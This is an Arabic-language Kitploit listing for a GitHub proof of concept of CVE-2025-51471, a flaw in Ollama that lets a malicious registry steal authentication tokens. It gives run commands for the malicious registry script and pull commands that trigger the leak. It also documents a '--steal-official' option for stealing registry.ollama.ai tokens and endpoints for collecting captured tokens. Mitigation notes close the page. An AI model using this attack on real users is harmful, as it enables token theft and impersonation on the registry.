Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-51471-POC — إثبات المفهوم (PoC) هذا مخصص للأغراض التعليمية واختبارات الأمان المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها. | Kitploit
أدوات/GitHubGitHub/ajtazer/cve-2025-51471-poc
تحليل الثغرات الأمنيةالاستغلالأمن الويبالمصادقةالفريق الأحمر
GitHubajtazer/cve-2025-51471-poc

CVE-2025-51471-POC

إثبات المفهوم (PoC) هذا مخصص للأغراض التعليمية واختبارات الأمان المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها.

عرض المستودع
22منذ 8 أشهرلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-51471 - إثبات مفهوم كشف التوكن عبر النطاقات في Ollama

CVE-2025-51471 Ollama CVSS

المؤلف: ajtazer

🔥 نظرة عامة

يحتوي هذا المستودع على إثبات مفهوم (PoC) لثغرة CVE-2025-51471، وهي ثغرة كشف توكن المصادقة عبر النطاقات (Cross-Domain Authentication Token Exposure) تؤثر على جميع إصدارات Ollama (بما في ذلك الأحدث).

📋 وصف الثغرة

عندما يقوم Ollama بسحب نموذج من خادم HTTPS يستجيب بـ 401 Unauthorized، فإنه يتبع رابط realm في ترويسة WWW-Authenticate دون التحقق من أنه ينتمي إلى نفس النطاق[...]

وهذا يسمح للمهاجم بـ:

  1. إعداد خادم "سجل" (registry) خبيث
  • خداع المستخدم لسحب نموذج من ذلك الخادم
  • إرجاع استجابة 401 مع ترويسة WWW-Authenticate تشير إلى نقطة نهاية يتحكم بها المهاجم
  • يقوم Ollama بإرسال توكن المصادقة الموقَّع بـ Ed25519 إلى المهاجم بشكل أعمى
  • يلتقط المهاجم التوكن
  • التأثير

    • الوصول إلى النماذج الخاصة على registry.ollama.ai
    • دفع نماذج خبيثة بهوية الضحية
    • انتحال شخصية الضحية على سجل Ollama

    🚀 بدء سريع

    المتطلبات الأساسية

    • Python 3.7+
    • Flask (pip install flask)
    • Ollama (أي إصدار)

    التثبيت

    root@kitploit:~
    git clone https://github.com/ajtazer/CVE-2025-51471-PoC.git
    cd CVE-2025-51471-PoC
    pip install flask
    

    تشغيل إثبات المفهوم

    1. شغّل خادم السجل الخبيث (وضع HTTP):
    root@kitploit:~
    python3 malicious_registry.py --no-ssl
    
    1. في طرفية أخرى، تأكد من أن Ollama قيد التشغيل:
    root@kitploit:~
    ollama serve
    
    1. قم بتشغيل الثغرة:
    root@kitploit:~
    # Using curl API
    curl http://localhost:11434/api/pull -d '{"model": "localhost:8080/malicious/model", "insecure": true}'
    
    # OR using ollama CLI
    ollama pull --insecure localhost:8080/malicious/model
    
    1. راقب طرفية الخادم لالتقاط التوكنات!

    🎬 عرض توضيحي (فيديو إثبات المفهوم)

    لقد عرضت إثبات المفهوم هذا في فيديو قصير — شاهده هنا:

    يوتيوب — عرض تجريبي لإثبات المفهوم

    ملاحظة (وضع HTTPS على macOS): إذا كنت تستخدم وضع HTTPS، أضف الشهادة المُنشأة إلى سلسلة المفاتيح (keychain) أو استخدم وضع HTTP مع --no-ssl.

    📖 خيارات الاستخدام

    root@kitploit:~
    python3 malicious_registry.py [-h] [--port PORT] [--no-ssl] [--steal-official]
    
    Options:
      --port, -p PORT       Port to listen on (default: 8080)
      --no-ssl              Use HTTP instead of HTTPS
      --steal-official, -s  Redirect to steal registry.ollama.ai tokens
      --no-verbose          Disable verbose output
    

    🔧 نقاط نهاية API

    نقطة النهايةالوصف
    /v2/*نقطة نهاية سجل وهمية (تُطلق الاستغلال)
    /v2/tokenنقطة نهاية التقاط التوكن
    /tokensعرض جميع التوكنات الملتقطة (JSON)
    /healthفحص صحة الخادم

    🛡️ التخفيف

    1. اسحب النماذج من مصادر موثوقة فقط
    2. توخَّ الحذر عند سحب النماذج من سجلات خارجية
    3. راجع PR #10750 للإصلاح الرسمي

    📝 الاعتمادات

    • المؤلف: ajtazer
    • الباحثون الأصليون:
      • Mohammed Benhelli (@FuzzingLabs)
      • Patrick Ventuzelo (@FuzzingLabs)
      • تقرير Huntr

    ⚠️ إخلاء المسؤولية

    إثبات المفهوم هذا مخصص لأغراض تعليمية واختبار أمني مصرح به فقط. لا تستخدمه ضد أنظمة لا تملكها.


    صُنع بـ ❤️ باستخدام Antigravity

    تنزيل الأداة